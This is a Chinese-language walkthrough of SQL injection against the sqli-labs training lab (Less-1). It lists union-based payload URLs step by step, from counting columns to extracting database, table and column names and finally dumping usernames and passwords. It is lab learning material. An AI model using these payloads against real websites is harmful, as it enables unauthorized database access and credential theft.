SQL注入实例(sqli-labs/less-1)

初始网页

从网页可知传递的参数名为 id,并且为数字类型

1、得知数据表有多少列

1.1 使用联合查询查找列数(效率低)
sql 复制代码
http://localhost/sqli-labs-master/Less-1/?id=1' union select 1,2 --+
1.2 使用order by查找列数(效率高)
sql 复制代码
http://localhost/sqli-labs-master/Less-1/?id=1' order by 3 --+

2、查看回显位置

sql 复制代码
?id=-1' union select 1,2,3 --+

3、查询当前数据库名

sql 复制代码
?id=-1' union select 1,database(),3 --+

4、查询当前表名

sql 复制代码
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

5、查询列名

sql 复制代码
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

6、查询最终数据

sql 复制代码
?id=-1' union select 1,group_concat(username,0x3a,password),3 from users --+

其他

查询当前数据库版本

sql 复制代码
?id=-1' union select 1,version(),3 --+

查询当前登录用户

sql 复制代码
?id=-1' union select 1,user(),3 --+
相关推荐
指尖上跳动的旋律6 分钟前
shell脚本定义特殊字符导致执行mysql文件错误的问题
数据库·mysql
一勺菠萝丶17 分钟前
MongoDB 常用操作指南(Docker 环境下)
数据库·mongodb·docker
lucky_syq1 小时前
Hive SQL和Spark SQL的区别?
hive·sql·spark
m0_748244831 小时前
StarRocks 排查单副本表
大数据·数据库·python
C++忠实粉丝1 小时前
Redis 介绍和安装
数据库·redis·缓存
wmd131643067122 小时前
将微信配置信息存到数据库并进行调用
数据库·微信
是阿建吖!2 小时前
【Linux】基础IO(磁盘文件)
linux·服务器·数据库
凡人的AI工具箱2 小时前
每天40分玩转Django:Django国际化
数据库·人工智能·后端·python·django·sqlite
ClouGence2 小时前
Redis 到 Redis 数据迁移同步
数据库·redis·缓存
m0_748236582 小时前
《Web 应用项目开发:从构思到上线的全过程》
服务器·前端·数据库